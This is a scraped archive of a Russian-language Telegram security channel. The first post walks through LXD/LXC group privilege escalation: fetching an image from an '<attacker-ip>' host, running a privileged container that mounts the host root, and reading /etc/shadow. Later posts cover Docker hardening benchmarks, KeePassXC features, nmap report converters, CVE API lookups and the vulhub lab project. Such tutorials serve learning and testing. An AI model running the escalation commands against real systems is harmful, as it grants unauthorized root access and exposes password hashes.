Cult Of Wire

Description
Мир проигравшего киберпанка.

Картинки, новости, мануалы, DIY.

Для связи: @the29a
Subscribers

We recommend to visit

Сотрудничество info@litvinpr.ru

Last updated 1 month, 2 weeks ago

Мы #1 в кино🎬

Все материалы размещены по партнёрской програме ivi.ru | All materials are posted on the partner program ivi.ru

❗️Администрация не несёт ответственность за рекламу. Будьте внимательны❗️

Менеджер по рекламе: @kuzr103

Last updated 1 month, 2 weeks ago

Утро начинается не с кофе.

Сотрудничество: @evoanna (по всем вопросам, только мне писать)

Last updated 1 month, 2 weeks ago

5 months, 3 weeks ago

From LXC to etc

Использование чистого lxc в природе сейчас встретишь не часто, но в некоторых дистрибутивах он есть, например в Ubuntu 20.04.
И раз у нас есть такая крутая штука, то странно ей не воспользоваться.
Вообще это довольно интересный и своеобразный вектор атаки, и пишут про него не особо часто (ну да, ведь везде docker).

- Собираем образ на своей машине:
git clone https://github.com/saghul/lxd\-alpine\-builder cd lxd\-alpine\-builder sudo ./build\-alpine \-a i686Скачиваем файл
Полученный файл можно куда-то выгрузить, а можно раздать с веб-сервера, например так:

```
python3 -m http.server 8080

```
Забираем файл так:

```
wget http://<attacker\-ip>:8080/alpine-v3.16-i686-20220603_1113.tar.gz

```
Или так:

```
curl http://<attacker\-ip>:8080/alpine-v3.16-i686-20220603_1113.tar.gz --output alpine-v3.16-i686-20220603_1113.tar.gz

`` Как альтернативный вариант, можем использовать сразу образ из репозитория:wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/alpine-v3.13-x86_64-20210218_0139.tar.gz`Импортируем образ:

```
lxc image import ./alpine*.tar.gz --alias evilimage

```
Предварительно проверяем, используется ли lxc

```
ip a | grep lxd
lxc list
lxc image list

`` И если ничего нет, то запускаем начальную настройку:lxd init`Запускаем образ:

```
lxc init evilimage evilcontainer -c security.privileged=true

```
Монтируем /root в образ:

```
lxc config device add evilcontainer victimdevice disk source=/ path=/mnt/root recursive=true

`` Запускаем и радуемся результатуlxc start evilcontainer
lxc exec evilcontainer /bin/sh
cat /mnt/root/etc/shadow`И пара ссылок на тему:
lxd/lxc Group - Privilege escalation
Linux Privilege Escalation – Exploiting the LXC/LXD Groups

6 months ago

И немного дополню это всё, так как только инструментами всё не решается.

CIS BenchmarksDocker Best Practice)Aquasec Top 20 Docker Security Best PracticesДа, кроме этого есть ещё clair, Lynis, но первый довольно масштабный, и нужен не всем, а Lynis довольно своеобразен.

Если вы не планируете интеграцию в CI/CD, то trivy отличный вариант.
А в CI/CD можно и dockle или clair засунуть интегрировать.

CIS

CIS Benchmarks™

CIS Benchmarks help you safeguard systems, software, and networks against today's evolving cyber threats.

И немного дополню это всё, так как только инструментами всё не решается.
6 months ago

А ещё у него есть cli.

Не сказать, что он божественный и удобный (у меня автокомплит не работает), но он есть и даже работает.

Mankier

keepassxc-cli man page - keepassxc - General Commands

keepassxc-cli is the command line interface for the KeePassXC password manager.

А ещё у него есть [cli](https://www.mankier.com/1/keepassxc-cli).
6 months ago

Неочевидная фича KeePassXC.

В KeePassXC можно посмотреть статистику стойкости паролей и их реюз.

Database \-> Database Reports \-> Health Check.P.S. Там же есть ещё проверка паролей на haveibeenpwned.com, вдруг кому надо.

6 months, 3 weeks ago

Превращаем простыню в отчет.

Не секрет, что вывод nmap читать довольно проблемно, особенно при большом количестве хостов, да ещё и со скриптами.

Разбирать это всё руками удовольствие сомнительное, хочется сей труд упростить.

Нашёл для себя nmap-formatter. Небольшой инструмент, позволяющий конвертировать xml-вывод в html, csv, markdown и json.

Работает не идеально (местами ссылки там, где их нет, например), но сильно упрощает дело.

Ещё есть nmap2md. Строит небольшие таблицы в markdown, и с хитрым сканированием может не работать.
Но для простого сканирования, вроде инвентаризации своей сети вполне подойдет.

GitHub

GitHub - vdjagilev/nmap-formatter: A tool that allows you to convert NMAP results to html, csv, json, markdown. Simply put it's…

A tool that allows you to convert NMAP results to html, csv, json, markdown. Simply put it's nmap converter. - GitHub - vdjagilev/nmap-formatter: A tool that allows you to convert NMAP resu...

Превращаем простыню в отчет.
7 months, 1 week ago

Получаем информацию о CVE через API.

Автоматизированные сканеры это хорошо, но false positive никто не отменял. Проверять это всё надо, но руками гуглить вариант долгий. Будем использовать публичный API.

Получить инфу по CVE со всеми деталями:

```
curl -s https://cve.circl.lu/api/cve/CVE-2021-41773

```
Получаем информацию по CVE, выводя только версии ПО:

```
curl -s https://cve.circl.lu/api/cve/CVE-2021-41773 | jq ".id, .vulnerable_product"

```
Получаем информацию по CVE из списка:

```
cat cve.list | xargs -I % curl -s https://cve.circl.lu/api/cve/% | jq ".id, .vulnerable_product"

```

Кроме публичного API можно развернуть свой CVE-Search c ~~преферансом и куртизанками~~ Mongo и Flask.
И даже библиотека для Python есть.

P.S. Не удаётся получить список CVE по вендору, толи лыжи не едут, толи в локальной версии надо смотреть.

Документация к API
Локальный CVE-SearchБиблиотека python

cve-search core team

cve-search public api. | cve-search - tool-set to perform local searches for known vulnerabilities

cve-search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs.

Получаем информацию о CVE через [API](https://www.cve-search.org/api/).
7 months, 1 week ago

Тут таблицу со всякими security сертификациями обновили.

Как и всегда, в топе сертификации от OffSec и GIAC.

Paul Jerimy Media

Security Certification Roadmap - Paul Jerimy Media

IT Security Certification Roadmap charting security implementation, architecture, management, analysis, offensive, and defensive operation certifications.

Тут [таблицу](https://pauljerimy.com/security-certification-roadmap/) со всякими security сертификациями обновили.
7 months, 1 week ago

Dockerhub + vulnhub = vulhub?

Виртуальные машины с уязвимостями это хорошо, а docker лучше.
Пока искал, как ещё развернуть уязвимый сервис, нашёл крутой проект от китайских коллег.

Братья из поднебесной заботливо собирают сервисы с CVE в виде docker-контейнеров, всё рассортировано по сервисам и номерам CVE.

Кроме того, в комлекте идут PoC или эксплоиты.

Документация почти вся на китайском, но почти всё сводится к:

```
cd service/CVE
docker-compose build
docker-compose up -d

```
Отличный повод перестать бояться и полюбить Docker.

Сайт проекта.
Репозиторий проекта.

vulhub.org

Vulhub - Docker-Compose file for vulnerability environment

Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。

Dockerhub + vulnhub = vulhub?

We recommend to visit

Сотрудничество info@litvinpr.ru

Last updated 1 month, 2 weeks ago

Мы #1 в кино🎬

Все материалы размещены по партнёрской програме ivi.ru | All materials are posted on the partner program ivi.ru

❗️Администрация не несёт ответственность за рекламу. Будьте внимательны❗️

Менеджер по рекламе: @kuzr103

Last updated 1 month, 2 weeks ago

Утро начинается не с кофе.

Сотрудничество: @evoanna (по всем вопросам, только мне писать)

Last updated 1 month, 2 weeks ago